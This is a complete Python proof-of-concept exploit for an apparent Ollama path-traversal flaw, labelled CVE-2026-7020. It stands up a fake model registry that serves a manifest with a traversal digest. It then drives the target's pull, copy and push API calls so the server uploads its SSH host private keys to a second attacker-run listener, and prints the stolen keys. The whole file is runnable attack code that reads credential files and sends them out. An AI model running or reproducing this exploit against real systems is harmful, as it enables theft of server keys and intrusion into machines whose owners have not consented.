#!/usr/bin/env python3 """CVE-2026-7020 — Ollama tensor digest path traversal -> SSH key exfil Usage: python3 poc.py Example: python3 poc.py 192.168.1.50:11434 """ import hashlib, json, socket, sys, threading, time, urllib.request from http.server import HTTPServer, BaseHTTPRequestHandler if len(sys.argv) != 2: sys.exit(f"usage: {sys.argv[0]} HOST:PORT") HOST = sys.argv[1] LPORT = 9999 KEYS = [ ("/etc/ssh/ssh_host_ed25519_key", [399, 411, 419, 432]), ("/etc/ssh/ssh_host_rsa_key", [2590, 2594, 2598, 2602, 2606, 2610, 2614, 2622, 2635]), ("/etc/ssh/ssh_host_ecdsa_key", [492, 497, 501, 505, 509, 513, 517, 521, 525]), ] CFG = b'{"architecture":"amd64","os":"linux"}' CFG_D = "sha256:" + hashlib.sha256(CFG).hexdigest() def local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(("8.8.8.8", 80)); return s.getsockname()[0] finally: s.close() LIP = local_ip() st = {} got = {} class Reg(BaseHTTPRequestHandler): def do_GET(self): if "/manifests/" in self.path: m = json.dumps({"schemaVersion": 2, "mediaType": "application/vnd.docker.distribution.manifest.v2+json", "config": {"mediaType": "application/vnd.docker.container.image.v1+json", "digest": CFG_D, "size": len(CFG)}, "layers": [{"mediaType": "application/vnd.ollama.image.tensor", "digest": st["trav"], "size": st["size"]}]}).encode() self.send_response(200) self.send_header("Content-Type", "application/vnd.docker.distribution.manifest.v2+json") self.send_header("Content-Length", str(len(m))) self.send_header("Docker-Content-Digest", "sha256:" + hashlib.sha256(m).hexdigest()) self.end_headers(); self.wfile.write(m) elif "/blobs/" in self.path: self.send_response(200) self.send_header("Content-Length", str(len(CFG))) self.end_headers(); self.wfile.write(CFG) else: self.send_response(200) self.send_header("Docker-Distribution-API-Version", "registry/2.0") self.end_headers() def do_HEAD(self): code = 200 if "/blobs/" in self.path else 404 self.send_response(code) if code == 200: self.send_header("Content-Length", str(len(CFG))) self.end_headers() def log_message(self, *a): pass class Exf(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Docker-Distribution-API-Version", "registry/2.0") self.end_headers() def do_HEAD(self): self.send_response(404); self.end_headers() def do_POST(self): cl = int(self.headers.get("Content-Length", 0)) if cl: self.rfile.read(cl) self.send_response(202) self.send_header("Location", f"http://{LIP}:{LPORT+1}{self.path.rstrip('/')}/u") self.send_header("Docker-Upload-UUID", "u"); self.end_headers() def do_PATCH(self): cl = int(self.headers.get("Content-Length", 0)) data = self.rfile.read(cl) if cl else b"" self._cap(data) self.send_response(202) self.send_header("Location", f"http://{LIP}:{LPORT+1}{self.path}") self.send_header("Range", f"0-{max(cl-1, 0)}") self.send_header("Docker-Upload-UUID", "u"); self.end_headers() def do_PUT(self): cl = int(self.headers.get("Content-Length", 0)) data = self.rfile.read(cl) if cl else b"" if "/manifests/" not in self.path: self._cap(data) self.send_response(201); self.end_headers() def _cap(self, data): clean = data.rstrip(b"\x00") if clean and (p := st.get("path")): if len(clean) > len(got.get(p, b"")): got[p] = clean def log_message(self, *a): pass def api(ep, body, t=20): try: r = urllib.request.Request(f"http://{HOST}{ep}", data=json.dumps(body).encode(), headers={"Content-Type": "application/json"}) return urllib.request.urlopen(r, timeout=t).read().decode() except Exception as e: return str(e) for cls, port in [(Reg, LPORT), (Exf, LPORT+1)]: threading.Thread(target=HTTPServer(("0.0.0.0", port), cls).serve_forever, daemon=True).start() time.sleep(0.3) for i, (path, sizes) in enumerate(KEYS): for size in sizes: tag = f"x{i}s{size}" st.update({"trav": f"sha256:../../../../../../../../{path.lstrip('/')}", "size": size, "path": path}) src = f"http://{LIP}:{LPORT}/l/{tag}:v" dst = f"http://{LIP}:{LPORT+1}/l/{tag}:v" if "success" in api("/api/pull", {"model": src, "insecure": True, "stream": False}).lower(): api("/api/copy", {"source": src, "destination": dst}) api("/api/push", {"model": dst, "insecure": True, "stream": False}, t=30) api("/api/delete", {"model": src}) api("/api/delete", {"model": dst}) if path in got: break for path, data in got.items(): print(f"=== {path} ===\n{data.decode(errors='replace')}")